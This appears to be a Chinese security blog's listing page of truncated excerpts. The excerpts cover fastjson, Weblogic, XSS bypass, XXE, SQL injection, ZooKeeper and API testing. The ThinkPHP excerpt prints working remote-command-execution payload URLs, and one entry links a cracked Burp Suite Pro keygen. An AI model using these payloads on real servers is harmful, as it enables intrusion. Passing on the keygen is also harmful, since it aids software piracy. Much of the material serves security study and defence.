0x00:漏洞情况
前2周接到外部安全厂商阿里开源组件fastjson爆发高危漏洞预警,该漏洞可通过恶意构造Paylod发送JSON请求对系统进行远程代码执行,可导致直接获取服务器权限。前边很久之前对漏洞进行复测,确认通过该漏洞可直接获取服务器权限,漏洞风险高。
上边文章的介绍采用的是rmi的方式进行监听反弹,无奈没复测成功。今天将漏洞的ldap方式利用过程写成博客记录下形成笔记。
影响版本fastjson < 1....
基于攻击流量和日志对Weblogic各类漏洞的分析思路
前言
在最近的几次应急响应中,基于Weblogic反序列化漏洞的攻击是非常常见的攻击手段,于是在应急响应结束之余我希望将实战中的一些分析经验和思路进行总结,提炼出一套Weblogic类漏洞攻击的分析思路和方法。在这篇文章中,我将跟大家总结Weblogic日志基础知识,以及如何利用Weblogic攻击流量和日志深度分析和挖掘Weblogic的4种漏洞攻击场景。
一、“九层之台起累土”— Weblogic环境...
安全扫描工具Arachni源码分析(一)
Arachni是一个基于Ruby on Rails框架的Web安全漏洞扫描工具。
1. Ruby on Rails
Ruby on Rails ,缩写ROR,是一个Web框架,包括两部分内容: Ruby 语言和 Rails 框架。Ruby一直以来流行于日本,直到2004年,26 岁的丹麦人 David Heinemeier Hansson 提出了Web框架 - Rails。这才让全世界人们,开始了解Ruby和Rails的灵活与高效。
1.1 Ruby
日本人松本行弘( Matsumoto Yukihiro),在 1993 年开始着手...
使用JavaScript全局变量绕过XSS过滤[bypass XSS]
使用JavaScript全局变量绕过XSS过滤[bypass XSS]
虽然你的攻击目标看起来似乎很容易通过XSS攻击来拿下,但当你尝试了所有的利用方式都被过滤器、输入验证或WAF规则所过滤时,怎么办呢? 让我们探索如何使用JavaScript全局变量绕过XSS过滤.
在本文中,当目标网站存在XSS过滤器或防火墙时,我们在这里一起来探索一下有多少种可能性利用反射型(甚至存储型)XSS。 最有效的方法之一是使用一个全局变量例如 self, docu...
API 接口渗透测试
1 API 接口介绍
1.1 RPC(远程过程调用)
远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程。如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Java RMI。
RPC 一般直接使用 TCP 协议进行通信,通常不涉及到 HTTP。HTTP 下面有2种技...
ZooKeeper 未授权访问漏洞
0x00 漏洞简介
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
0x01 环境搭...
Burp Suite Pro Loader&Keygen By surferxyz(附带v1.7.31原版)
surferxyz发布在EXETOOLS,地址:https://forum.exetools.com/showpost.php?p=112008&postcount=83,原文如下:
I made a loader/keygen that should work on future versions of burp suite pro, unless they specifically target it/change the license scheme.
Download loader/keygen here: http://www36.zippyshare.com/v/WRy3bGWf/file.html
Works on 1.6.x up until the latest version 1....
JAVA常见的XXE漏洞写法和防御
说明
貌似最近经常看到有Java项目爆出XXE的漏洞并且带有CVE,包括Spring-data-XMLBean XXE漏洞、JavaMelody组件XXE漏洞解析、Apache OFBiz漏洞。微信支付SDK的XXE漏洞。本质上xxe的漏洞都是因为对xml解析时允许引用外部实体,从而导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。
apache OFBiz中的XML解析是由UtilXml.java中readXmlDocument()完成的:
1
2
3 ...
thinkphp 5.0-5.1 命令执行流水账记录
0x00 没有开头
0x01 文章参考
0x00 没有开头
环境部署安排一下

bt一键部署:配合泛解析域名,轻松部署环境
漏洞复现 qq.com为vuln host
http://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id
//5.1
http://qq.com/?s=index/\think\Request/input&filter=phpinfo&data=1
http://qq.com/?s=index/\think\template...
高级SQL注入:混淆和绕过
最近在学习代码审计,于是发现了这篇文章,然后转过来学习学习, 并稍加了修改
也不知道这位大哥转的谁的文章,也没有附上原文链接,
转发地址:https://blog.csdn.net/ncafei/article/details/62044552
简介:
本文将要揭示能用于现实CMSs和WAFs程序中的高级绕过技术和混淆技术,
文中所提到的SQL注入语句仅仅是一些绕过保护的方法,
另外本文所有内容仅可用于安全研究,如有其它不正当的行为,后果自负...